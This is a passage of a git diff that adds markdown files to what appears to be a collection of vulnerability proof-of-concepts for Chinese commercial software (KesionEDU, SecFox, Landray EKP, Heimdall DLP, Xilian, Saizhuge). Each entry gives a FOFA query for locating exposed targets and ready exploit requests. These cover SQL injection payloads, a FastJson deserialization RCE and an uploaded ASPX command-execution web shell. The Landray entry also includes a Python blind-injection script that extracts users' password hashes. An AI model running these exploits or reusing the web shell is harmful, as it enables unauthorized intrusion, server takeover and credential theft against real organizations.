+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+file_info={"name":"1.php"}&
+```
+
+![image-20241227212839673](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272128744.png)
+
+文件路径
+
+```
+/crm/storage/2024/December/week4/回显文件名.php
+```
+
diff --git a/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md b/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
new file mode 100644
index 0000000..d03786a
--- /dev/null
+++ b/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 科汛新职教网校系统CheckOrder存在SQL注入漏洞
+
+科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="/KS_Inc/static/edu"
+```
+
+## poc
+```javascript
+POST /webapi/APP/CheckOrder HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: application/json, text/javascript, */*; q=0.01
+Priority: u=0
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+
+{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}
+```
+
+![image-20241227223044294](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272230369.png)
\ No newline at end of file
diff --git a/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md b/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
new file mode 100644
index 0000000..af5282e
--- /dev/null
+++ b/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
@@ -0,0 +1,33 @@
+# 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞
+
+网神SecFox运维安全管理与审计系统 authService接口处使用存在漏洞 fastjson 组件,未授权的攻击者可通过fastjson 序列化漏洞对系统发起攻击获取服务器权限。
+
+## fofa
+```javascript
+body="./static/js/vendor.022b3d3adf3423f31f54.js"
+```
+
+## poc
+```javascript
+POST /3.0/authService/login HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
+Cmd: id
+Content-Type: application/json;charset=utf-8
+Referer: https://
+Accept-Encoding: gzip
+Connection: close
+
+{
+ "a": {
+ "@type": "java.lang.Class",
+ "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
+ },
+ "b": {
+ "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
+ "userOverridesAsString": "HexAsciiSerializedMap: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;"
+ }
+}
+```
+
+![image-20241227221404049](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272214131.png)
\ No newline at end of file
diff --git a/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md b/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
new file mode 100644
index 0000000..dde9a1f
--- /dev/null
+++ b/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
@@ -0,0 +1,166 @@ +# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞 + +蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +app="Landray-OA系统" +``` + +## poc + +访问save方法,填充一下数据库 + +```javascript +POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 + +method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1 +``` + +```javascript +POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 60 + +method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png) + + + +## Python脚本 + +```python +import argparse + +import requests + +header = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" +} + + +def exploit_user(url,db_user): + global header + user_name = "" + for i in range(1, 20): + low = 1 + top = 255 + mid = (low + top) // 2 + while low < top: + send_data = { + "method": "getICareByFdId", + "ordertype": "down", + "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format( + i, mid) + } + 
res = requests.post(url, data=send_data, headers=header) + if "docSubject" in res.text: + top = mid + else: + low = mid + 1 + mid = (top + low) // 2 + if mid <= 1 or mid >= 254: + break + user_name = user_name + chr(mid - 1) + print("[+]user_name:{}".format(user_name)) + print("\033[F", end="") + print("[+]user_name:{}".format(user_name)) +def exploit(url,username): + global header + password_len = 32 + password = "" + for i in range(1,password_len+1): + low = 1 + top = 255 + mid = (low + top) // 2 + while low < top: + send_data = { + "method": "getICareByFdId", + "ordertype": "down", + "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format( + username,i, mid) + } + res = requests.post(url,data=send_data,headers=header) + if "docSubject" in res.text: + top = mid + else: + low = mid + 1 + mid = (top + low) // 2 + password = password + chr(mid-1) + print("[+]password:{}".format(password)) + print("\033[F",end="") + print("[+]password:{}".format(password)) + +def scan_vuln(url,username,db_user): + global header + req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do" + + step_data = { + "method":"saveICare", + "fdId:""," + "fdNum":"1", + "docSubject":"1", + "fdName":"test", + "createTime":"1", + "fdStatus":"1" + } + try: + req1 = requests.post(req_url,data=step_data,headers=header) + if req1.status_code == 200 and "result" in req1.text: + print("[+]Vuln exist,start inject password:") + if db_user == "check": + exploit_user(req_url,db_user) + else: + exploit(req_url,username) + else: + print("[-]Vuln not exist.") + exit(0) + except: + print("[-]request error.") + exit(0) + pass + + +def main(): + parser = argparse.ArgumentParser(description="Process command line arguments") + parser.add_argument('-u', '--url', required=True, help='Target URL') + parser.add_argument('-db_user', '--db_user', required=False, help='db_user') + 
parser.add_argument('-U', '--username', required=False, help='Username argument')
+
+ args = parser.parse_args()
+
+ url = args.url
+ db_user = args.db_user
+ username = args.username
+ scan_vuln(url, username, db_user)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD
\ No newline at end of file
diff --git a/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md b/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..acb8e22
--- /dev/null
+++ b/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞
+
+虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="userReg/initUserReg.do"
+```
+
+## poc
+```javascript
+POST /dlp/userReg/pushSetup.do HTTP/1.1
+Host:
+Priority: u=4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+setupName={{urlescape(1' AND (SELECT 6789 FROM (SELECT(SLEEP(5)))nxdq) AND 'vpUG'='vpUG)}}
+```
+
+![image-20241227223225696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272232761.png)
\ No newline at end of file
diff --git a/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md b/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md
new file mode 100644
index 0000000..71359c4
--- /dev/null
+++ b/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md
@@ -0,0 +1,59 @@ +# 西联软件移动门店管理系统treamToFile文件上传漏洞 + +西联软件-移动门店管理系统 StreamToFile 接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa +```javascript +body="西联软件提供云计算服务" +``` + +## poc +```javascript +POST /api/UploadDB/StreamToFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: */* +Connection: close + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="organ" + +qwert +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="devid" + +yuiop +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="files";filename="1.aspx" +Content-Type: image/png + +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- +``` + +![image-20241227221622454](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272216534.png) + +文件路径 + +``` +/Files/DB/qwert_yuiop.aspx?cmd=dir +``` + diff --git a/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md b/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md new file mode 100644 index 0000000..00a4864 --- /dev/null +++ b/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@
+# 赛诸葛数字化智能中台系统login存在SQL注入漏洞
+
+赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="static/index/image/login_left.png" || icon_hash="1056416905"
+```
+
+## poc
+```javascript
+POST /login HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+username=1')) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(3469=3469,version()))),0x7e),3469) AND (('fOfY'='fOfY&loginType=1&password=bbb8aae57c104cda40c93843ad5e6db8&phone_head=86&wx_openid=&member=
+```
+
+![image-20241227221000969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272210041.png)
\ No newline at end of file